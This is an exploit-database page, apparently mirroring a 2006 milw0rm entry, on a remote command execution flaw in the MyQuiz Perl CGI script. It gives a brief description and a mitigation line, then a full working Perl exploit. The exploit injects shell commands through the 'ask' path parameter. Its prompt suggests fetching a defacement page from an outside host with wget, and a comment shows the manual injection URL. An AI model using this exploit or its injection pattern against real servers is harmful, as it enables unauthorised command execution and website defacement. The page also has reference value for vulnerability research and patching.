header-logo
Suggest Exploit
vendor:
MyQuiz
by:
Hessam-x
9,3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: MyQuiz
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MyQuiz Remote Command Execution Exploit

This exploit allows an attacker to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'ask' parameter of the 'myquiz.pl' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious commands to the vulnerable system. Successful exploitation of this vulnerability can result in arbitrary command execution on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x  / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded
# /   |   \_____    ____ |  | __ ___________________
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   /
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \
#       \/      \/     \/     \/    \/            \/
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net

use LWP::Simple;

print "-------------------------------------------\n";
print "= MyQuiz Remote Command Execution Exploit =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


       print "Target(www.example.com)\> ";
       chomp($targ = <STDIN>);

       print "path: (/cgi-bin/myquiz.pl/ask/)\>";
       chomp($path=<STDIN>);

       print "command: (wget www.hackerz.ir/deface.htm)\>";
       chomp($comd=<STDIN>);


$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request,wait....\n";
get("http://".$targ.$path.";".$comd."|")
print "[+] Exploiting request done!\n";
print "Enjoy !";

# milw0rm.com [2006-02-06]

Navigation

Suggest Exploit

Services By CQR